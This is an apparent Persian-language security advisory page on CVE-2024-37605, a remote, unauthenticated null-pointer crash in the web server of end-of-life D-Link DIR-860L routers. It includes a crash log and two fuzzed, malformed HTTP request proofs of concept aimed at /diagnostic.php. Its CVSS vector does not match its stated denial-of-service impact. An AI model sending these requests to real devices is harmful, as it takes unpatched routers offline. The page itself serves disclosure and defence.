خانه » CVE-2024-37605
هشدار‌های امنیت سایبری

CVE-2024-37605

آسیب پذیری انکار سرویس در روتر D-Link DIR-860L

توسط Vulnerbyte_Alerts
نوشته شده توسط Vulnerbyte_Alerts
  • شناسه CVE-2024-37605 :CVE
  • CWE476 :CWE
  • dlink.com/ SAP10397 :Advisory
  • منتشر شده: دسامبر 17, 2024
  • به روز شده: دسامبر 17, 2024
  • امتیاز: 6.5
  • وضعیتPublished :CVE
  • Yes :POC
  • وضعیت آسیب پذیری: patch نشده

چکیده

این آسیب پذیری مربوط به D-Link DIR-860L نسخه 2.04.B04 می باشد که در دسته آسیب پذیری های متوسط دسته بندی می شود. به نظر می رسد که این مشکل بر روی عملکرد المان HTTP Handler تاثیر خواهد گذاشت. دستکاری این المان منجر به بازخوانی null pointer می شود. حمله می تواند از راه دور راه اندازی شود.

توضیحات

یک آسیب پذیری عدم ارجاع null pointer در D-Link DIR-860L نسخه 2.04.B04 وجود دارد که می تواند مستقیما یک سرور وب در یک دستگاه ریموت بدون احراز هویت از کار بیفتد و نتیجه آن حمله انکار سرویس خواهد بود.

آسیب پذیری در فایل باینری sbin/httpd/ رخ می دهد. زمانی که sbin/httpd/ درخواست HTTP که با دقت ساخته شده باشد را دریافت کند به دلیل ارجاع به یک null pointer از کار می افتد.

خروجی که در زمان از کار افتادن برنامه نشان داده می شود به شکل زیر است:

/sbin/httpd: libc/misc/ctype/ctype.c: 281: tolower: Assertion `((((unsigned int)((c) – 0)) <= ((127 * 2 + 1) – 0)) || ((c) == (-1)))’ failed.
qemu: uncaught target signal 6 (Aborted) – core dumped

به نظر می رسد که این آسیب پذیری ناشی از پردازش هدر HTTP می باشد و ارتباطی به فایل دستکاری شده که بر روی دستگاه بارگذاری شده است ندارد. این مشکل می تواند بدون انجام هیچ گونه احراز هویتی ایجاد شود.

سیستم امتیاز دهی آسیب پذیری ها بر اساس استاندارد های تحقیقاتی حوزه نمره دهی به آسیب پذیری ها، امتیازات زیر را برای شدت اثرگذاری این آسیب پذیری در نظر گرفته است.

CVSS

Score Severity Version Vector String
6.5 MEDIUM 3.0 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

لیست محصولات آسیب پذیر

در زمان انتشار این اعلامیه، محصولات زیر در معرض این آسیب پذیری قرار دارند:

 

  • D-Link DIR-860L 04.B04_ic5b

لیست محصولات بروز شده

کلیه نسخه های سخت افزاری D-Link DIR-860L به پایان چرخه تولید و سرویس دهی خود رسیده اند. آسیب پذیری های متعددی در مورد این محصولات گزارش شده است.

منابع مربوط به این محصولات به پایان توسعه خود رسیده اند و دیگر پشتیبانی دریافت نمی کنند. شرکت D-Link توصیه کرده این محصولات را با محصولاتی که بروزرسانی های نرم افزاری دریافت می کنند جایگزین کنید.

نتیجه گیری

آسیب پذیری فوق در دسته آسیب پذیری های متوسط (Medium) دسته بندی می شود. توصیه شده است که به منظور رفع این تهدید، از محصولاتی که بروزرسانی های نرم افزاری دریافت می کنند استفاده کنید.

منابع

  1. https://www.cve.org/CVERecord?id=CVE-2024-37605
  2. https://www.cvedetails.com/cve/CVE-2024-37605/
  3. https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-37605&sortby=bydate
  4. https://vuldb.com/?id.288748
  5. https://docs.google.com/document/d/1cWlVLaVvr_xzkqbKIXY7EW89hNHE89SSlNtesv6lzl8/edit?tab=t.0#heading=h.hyyv1x19ys9n
  6. https://cwe.mitre.org/data/definitions/476.html

 

POC:

PoC1:

POST /diagnostic.php HTTP/1.1
Host:192.16<.0.1
Proxy-Connection: keep-alive
Content-LengE; .NET4.0CA
Content-Tylla/5.0 (co%s%s <max>20</max>
<count>mpatible; MSIWindows NT 10.0; Tr|dent/7.0; .NET4.0E; .NET4.0C)
WWWWWWWWWWWWWWWWWWWContent-Type: application/x-www-form-urlencoeed
Accept: */*
Origin: http://192.168.0.1
Refere: http://192.168.0.1/tools_checm.dhp
Accept-Encodifg: gzip, deflate
Accept-Language: en.USBen;q=0.9
Cookie: uid=VnvoKJ<81B$E1RZ9

 

PoC2:

nostic.php HTTP/8.1aaaaa
H68.0.gth: 14
aaaaaaaaaa068.G.1.a/5.0 ica{ion2

 

همچنین ممکن است دوست داشته باشید

CVE-2025-23006

CVE-2025-20165

CVE-2024-56914

CVE-2025-20156

CVE-2025-20128

CVE-2025-24014

CVE-2025-21399

CVE-2025-21185

CVE-2024-45331

CVE-2024-57677

پیام بگذارید

نام ، ایمیل و وب سایت خود را برای بار دیگر که اظهار نظر می کنم در این مرورگر ذخیره کنید.